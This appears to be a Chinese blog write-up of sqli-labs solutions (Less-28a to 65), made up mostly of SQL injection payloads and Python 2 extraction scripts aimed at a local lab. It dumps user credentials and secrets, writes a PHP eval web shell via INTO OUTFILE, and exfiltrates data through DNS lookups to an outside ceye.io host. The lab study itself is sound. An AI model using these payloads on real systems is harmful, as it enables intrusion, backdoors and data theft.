# does not filter spaces, so the %a0 substitution is unnecessary but harmless.
row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28a/?id="+row).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html
print row

Day33-Less29

分析

这题应该用 login.php 来玩
index.php 没啥用啊  

这题第一次接触的时候没审计代码怕是过不去
首先能猜出后面只允许数字过,剩下的就都不知道了

审计代码发现,先过一个 java_implimentation,把第一个叫 id 的参数拿出来,然后,把这个参数扔到 whitelist 的白名单过滤
但是,$id=$_GET['id']; 取到的却是最后一次出现的 id,也就是说,第二个出现的 id 完全没有经过过滤。所以可以这样
?id=1&id=1'
就可以看到报错了
'1'' LIMIT 0,1
接下来该干啥干啥
select XX,XX,XX from XXX where id='' LIMIT 0,1

select XX,XX,XX from XXX where id='
0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1
' LIMIT 0,1

?id=1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1

代码

from requests import *
import re

# Less-29 (HTTP parameter pollution): `row` embeds a second "&id=" so the
# request carries id twice. Per the code-audit note above, the whitelist checks
# the first id while the query reads the last one. The defensive lesson is the
# same on any stack: validate exactly the value the query consumes.
row = "1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1'--+"
row = row.replace(' ','%a0')

# The payload is concatenated onto the URL, not passed via params=, so the
# embedded '&' is sent as-is and is what makes the duplicate parameter work.
html = get("http://localhost/sqllab/Less-29/login.php?id="+row).text
# Python 2 print statement.
print html

Day34-Less30

分析

与 29 相比,单引号改为双引号,其他一样
?id=1&id=0" union select 1,2,group_concat(username,'<>',password,'<br>') from users where "1

Day35-Less31

分析

与 30 相比,加了括号,其他一样
?id=1&id=0") union select 1,2,group_concat(username,'<>',password,'<br>') from users where ("1

Day36-Less32

分析

0' union select 1,2,group_concat(username,CHAR(61),password) from users--+

利用宽字节注入。
' -> %d6'

代码

from requests import *
import re

# Less-32 (wide-byte injection): every ' is prefixed with %d6 so the backslash
# the server inserts in front of the quote pairs with 0xd6 into one multibyte
# character, leaving the quote itself unescaped (see "' -> %d6'" above).
# The usual fix is a consistent connection charset (mysql_set_charset) plus
# parameter binding, rather than escaping by string replacement.
row = "0' union select 1,2,group_concat(username,CHAR(61),password) from users--+"
row = row.replace('\'','%d6\'')

html = get("http://localhost/sqllab/Less-32/?id="+row).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html
print row

Day37-Less33

分析

和 32 一样

Day38-Less34

分析

如果报编码错误,那就运行一下这个:
alter table users convert to character set gbk;


0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

from requests import *
import re

# Less-34: POST form variant of the wide-byte technique from Less-32.
# "\xd6" is a raw byte here because this is Python 2 (str is bytes); under
# Python 3 the same literal would be a Unicode code point and would be encoded
# differently on the wire.
pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-34/", data = pdata).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html

Day39-Less35

分析

数值型

0 union select 1,2,group_concat(username,CHAR(61),password) from users

Day40-Less36

分析

依然可用宽字节
0%d6\' union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day41-Less37

分析

和 34 一毛一样
0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

from requests import *
import re

# Less-37: same script as Less-34 with only the URL changed.
# "\xd6" is a raw byte because this is Python 2 (str is bytes).
pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-37/", data = pdata).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html

Day42-Less38

分析

Stacked injections:堆叠注入
就是多条语句,利用分号隔开
这题没有更好的场景,显得有点鸡肋
0' union select 1,2,group_concat(username,CHAR(61),password) from users--+
注入一句话倒是不错

Day43-Less39

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day44-Less40

分析

同 38
0') union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day45-Less41

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day46-Less42

分析

报错在登录的时候可以爆出

pdata = {
'login_user': '1',
'login_password' : "' union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#",
}
不过返回的时候 XPATH syntax error 有截断,遍历一下就 OK 了:
ERROR 1105 (HY000): XPATH syntax error: 'Dumb<>Dumb<br>,Angelina<>I-kill-'
或者利用 concat 一个一个搞也行

这种情况下,不需要知道用户名
还可以这样
1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#




代码

from requests import *
import re

# Less-42: stacked-query variant -- relies on the lab executing the statement
# after `;`. The hex literal is the file body written by INTO OUTFILE to the
# path given. On the defensive side this route depends on the DB account
# holding FILE and on secure_file_priv allowing that directory, and
# prepared-statement APIs do not execute stacked statements at all.
pdata = {
'login_user': '1',
'login_password' : "1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#",
}

html = post("http://localhost/sqllab/Less-42/login.php", data = pdata).text
# Python 2 print statements. NOTE(review): `'Dumb' in html` is a leftover
# check; nothing in this payload returns a user row.
print html
print 'Dumb' in html

Day47-Less43

分析

同 42
加了括号
') union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#

Day48-Less44

分析

基于时间
pdata = {
'login_user': '1',
'login_password' : "1' and (select sleep(2) from (select 1,2)x where length(database())=8)#",
}


不过这题可以重置所有用户的密码:
pdata = {
'login_user': '1',
'login_password' : "1' or '1' limit 1,1#",
}

来个更刺激的
' union select 1,group_concat(username,'=',password,'<br>'),3 from users#



select id,username,password from XXXX where username='1' and password='' union select 1,group_concat(username,'=',password,'<br>'),3 from users#' limit 0,1

代码

from requests import *
import re

# Less-44: union injected through the password field of the login form; the
# resulting query shape is sketched above (`... and password='' union select
# 1,group_concat(...),3 from users#' limit 0,1`).
pdata = {
'login_user': '1',
'login_password' : "' union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-44/login.php", data = pdata).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html

Day49-Less45

分析

和 44 一样,加了括号而已
') union select 1,group_concat(username,'=',password,'<br>'),3 from users#

代码

from requests import *
import re

# Less-45: same as the Less-44 script; only the leading `')` differs because
# the lab wraps the value in parentheses.
pdata = {
'login_user': '1',
'login_password' : "') union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-45/login.php", data = pdata).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html

Day50-Less46

分析

sort 注入
1. 利用 rand(true) 和 rand(false) 的结果不一样
?sort=rand(length(database())=7)
?sort=rand(length(database())=8)

2. 报错注入
?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
1 and (extractvalue(rand(),concat(0x3a,version())),1)

3. 延时注入
1 and (select sleep(1) from (select 1,2)x where length(database())=8)

4.其他
into outfile 啥的,都行

Day51-Less47

分析

与 46 相比,无法使用 rand 以外,其他都一样

Day52-Less48

分析

数字型
错误被屏蔽,延时注入即可

Day53-Less49

分析

与 48 一样,只不过是单引号型
1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day54-Less50

分析

堆叠注入
但是可以用前面几题过
0 or (select (extractvalue(rand(),concat(0x3a,version())),1))--+
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day55-Less51

分析

和 50 一样,加了单引号

1' and (select sleep(1) from (select 1,2)x where length(database())=7)--+
0' or (select (extractvalue(rand(),concat(0x3a,version())),1))--+


Day56-Less52

分析

盲注
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day57-Less53

分析

和 52 一样,加了引号而已

?sort=1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day58-Less54

分析

开始有意思了,限制查询 10 次
第一次
?id=1 正常
?id=1' 不正常,没报错
?id=1' or 1--+  正常
由于已知 databasename 是 challenges
那就先搞表名
?id=0' union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+
返回为

Your Login name:2
Your Password:35fb3t92ky<>id
,35fb3t92ky<>sessid
,35fb3t92ky<>secret_LKVY
,35fb3t92ky<>tryy

可以看到,表名为 35fb3t92ky,有 4 列:
id  sessid  secret_LKVY  tryy

?id=0' union select 1,2,group_concat(id,'<>',sessid,'<>',secret_LKVY,'<>',tryy,'<br>') from challenges.35fb3t92ky--+

代码

from requests import *
from re import *

def GetTableName():
    # One request (the lab allows ten, see above): lists every (table, column)
    # pair of the `challenges` schema via group_concat, using '=>' / '<>' as
    # field markers and a real newline (Python '\n') as the row separator.
    # Returns the list of (table_name, column_name) tuples the regex finds;
    # the table-name group only matches [a-z0-9]+, which fits the lab's
    # random names but nothing else.
    gdata = {
        'id': "0' union select 1,2,group_concat('=>',table_name,'<>',column_name,'\n') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'#"
    }

    r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
    html = r.text
    return findall(r'=>([a-z0-9]+)<>(.+)\n', html)

def GetColumnName(q,tablename):
    # Second request: reads the row values of `tablename`, with `q` being the
    # pre-built select list (columns joined by ,'<>',). Despite the name this
    # returns data, not column names.
    # NOTE(review): the regex hard-codes exactly four '<>'-separated fields and
    # findall(...)[0] raises IndexError if no row matched (e.g. when one of the
    # ten allowed attempts returns an error page).
    gdata = {
        'id': "0' union select 1,2,group_concat('=>',%s,'\n') from challenges.%s#" %(q,tablename)
    }
    r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
    html = r.text
    return findall(r'=>(.+)<>(.+)<>(.+)<>(.+)\n', html)[0]


# Driver: table[0][0] is the first table name; every tuple's second element is
# a column of that table (the script assumes a single table in the schema).
table = GetTableName()
tableName = table[0][0]
columns = '  [-]'+'\n  [-]'.join(i[1] for i in table)
# Python 2 print statements. NOTE(review): 'CotablenamelumnsNames' is a
# paste error in the label (meant 'ColumnsNames'); left as-is here.
print '[+]TableName:', tableName
print '[+]CotablenamelumnsNames:\n', columns

# Select list "col1,'<>',col2,..." in the same order the columns were listed.
q = ",'<>',".join(i[1] for i in table)
data = GetColumnName(q,tableName)

# data[2] is the third column, which per the listing above is secret_XXXX.
print '[!]Password is:', data[2]

Day59-Less55

分析

和 54 一样,只不过加了括号以及是数字型
0) union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges' or (0

?id=0) union select 1,2,group_concat(id,'<>',sessid,'<>',secret_25UU,'<>',tryy,'<br>') from challenges.e2du3yn5gq where (1

Day60-Less56

分析

和前 2 题一样的套路
?id=0') union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0') union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'<br>') from challenges.7j9km4qsh7--+

Day61-Less57

分析

和前 3 题一样的套路
?id=0" union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0" union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'<br>') from challenges.7j9km4qsh7--+

Day62-Less58

分析

?id=0' or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+


?id=0' or (extractvalue(rand(),(select group_concat('<>',secret_2EOZ) from challenges.ae85jljdmd)))--+



Day63-Less59

分析

和 58 一样,不过是数字型
?id=0 or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat('<>',secret_6GBR) from challenges.pebeduo6fx)))--+



Day64-Less60

分析

和 58 一样,不过是双引号加括号
?id=0") or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat('<>',secret_QIN6) from challenges.ortaw2xc59)))--+



Day65-Less61

分析

和 58 一样,不过是单引号加双括号
?id=0')) or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat('<>',secret_VSZ6) from challenges.est6bn4mqy)))--+

Day66-Less62

分析

盲注
交给 py 去做吧

不过次数应该会大于 130
找到了一个更好的办法,DNS 解析
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxxxxx.ceye.io\\abc'))

所以可以构造
http://localhost/sqllab/Less-62/?id=1') and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到
q1bcv0fqh9.xxxxxx.ceye.io

继续,得到表名
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

继续,得到 key
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_T82V FROM challenges.q1bcv0fqh9 limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

emm
有点开挂的赶脚..

代码

from requests import get
from string import ascii_letters, digits

def GuessTBNameLenth(n, name):
    # Boolean-blind length probe for the n-th table of schema `name`: asks
    # whether position i of the table name is non-empty (ascii() of an empty
    # SUBSTR is 0, i.e. false) and stops at the first position where the
    # 'Your Login name' marker disappears from the page. Returns i-1.
    # Each request increments the module-level guessTime counter.
    global guessTime
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    # Recovers one table name of DBName character by character: for each
    # position, tries every ascii letter then digit until the page shows the
    # 'Your Login name' marker. Returns the assembled name.
    # NOTE(review): `num` is accepted but never used and `no` is fixed at 0,
    # so only the first table is ever enumerated. A character outside
    # ascii_letters+digits is silently skipped (the inner loop simply ends
    # without a match), which would shorten the result with no error.
    global guessTime
    no = 0
    name = ''
    length = GuessTBNameLenth(no, DBName)
    print '  [-]Guessing Table Name'
    for i in xrange(length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1)='%s' --+" %(DBName,no,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print '    [-]', name
                break

    print '  [-]Tables Names is:', name
    return name

def GuessCLMNum(tname,dname):
    # Counts the columns of dname.tname by asking "i = count(COLUMN_NAME)" for
    # i = 0, 1, 2, ... until the marker appears. Returns that i.
    # NOTE(review): nothing in this script calls it; the driver goes straight
    # to GuessCLMName, which hard-codes the column index instead.
    global guessTime
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    # Length of the cnum-th column name of dname.tname, same ascii(SUBSTR())
    # probe as GuessTBNameLenth. Starts at i = 7 because the caller already
    # assumes the 'secret_' prefix (7 characters). Returns i-1.
    # NOTE(review): the column is picked by LIMIT position without ORDER BY, so
    # "cnum-th" is whatever order the server happens to return.
    global guessTime
    i = 7
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, tname):
    # Recovers the name of the third column (cnum = 2, i.e. "No.3" below) of
    # DBName.tname, assuming it begins with 'secret_' and guessing only the
    # positions after that prefix (xrange(7, length) with SUBSTR offset i+1),
    # then hands the finished name to GuessDatas.
    # NOTE(review): `data` holds the GuessDatas result but is never used and
    # the function returns None, so the recovered name and data only reach the
    # caller through the prints. The silent-skip caveat from GuessTBsNames
    # applies here too.
    global guessTime

    print '[+]Guessing Colunms for', tname
    cnum = 2 #No.3
    length = GuessCLMLen(cnum, tname, DBName)
    name = 'secret_'
    for i in xrange(7,length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)='%s' --+" %(tname,DBName,cnum,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print '    [-]', name
                break

    data = GuessDatas(DBName, tname, name)
    print '  [-]The Colunms are',name

def GuessDatasnum(dname, tname, cname):
    # Number of rows in dname.tname, probed as "i = count(cname)" for
    # i = 0, 1, 2, ... (count(col) ignores NULLs, so NULL cells are not
    # counted). Returns the first i for which the marker appears.
    global guessTime
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    # Length of the value in column cname of the n-th row of dname.tname,
    # using the same ascii(SUBSTR()) probe as the name-length helpers.
    # Returns i-1 for the first position i that is empty.
    global guessTime
    print '    [-]Guessing data length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    # Recovers every row of column cname in dname.tname: row count from
    # GuessDatasnum, per-row length from GuessDataLen, then one character per
    # position from ascii_letters+digits. Returns the list of recovered
    # strings (one per row).
    global guessTime
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in ascii_letters+digits:
                # Retry the request until it succeeds.
                # NOTE(review): the bare `except:` retries forever on a
                # persistent failure and also catches KeyboardInterrupt if
                # Ctrl-C arrives during get(), so the loop cannot be stopped
                # that way; catching requests' exception type with a bounded
                # retry count would be the usual shape.
                while 1:
                    try:
                        guessTime += 1
                        r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)='%s' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                # A character outside ascii_letters+digits is silently skipped.
                if 'Your Login name' in html:
                    name += n
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

# Driver. guessTime counts every HTTP request the helpers send (each of them
# declares it global and increments it); the total is printed at the end.
# NOTE(review): TBsNum is passed to GuessTBsNames, which ignores it.
guessTime = 0          
DBName = 'challenges'
TBsNum = 1
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print guessTime

Day67-Less63

分析

和 62 一样,要么盲注,要么 DNS 解析

?id=1' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到 ud7yymnibx

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

得到 secret_5YDC

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_5YDC FROM challenges.ud7yymnibx limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

Day68-Less64

分析

和 62 一样,要么盲注,要么 DNS 解析

?id=1)) and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到 ex06wyovlw

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

得到 secret_G074

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_G074 FROM challenges.ex06wyovlw limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

Day69-Less65

分析

和 62 一样,要么盲注,要么 DNS 解析

?id=1") and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到 gfpke05sif

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

得到 secret_SWQ8

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_SWQ8 FROM challenges.gfpke05sif limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

心得

sql 注入不仅仅局限于某种姿势,只有触类旁通才能熟练掌握
做这个 lab 的时候要手工注入,或者自己写脚本,不要用 sqlmap 之类的

End


本文标题: SqliLab 题解
原始链接: http://www.tr0y.wang/2017/12/11/SqliLab/
发布时间: 2017.12.11-23:04
最后更新: 2018.11.03-21:01
版权声明: 本站文章均采用CC BY-NC-SA 4.0协议进行许可。转载请注明出处!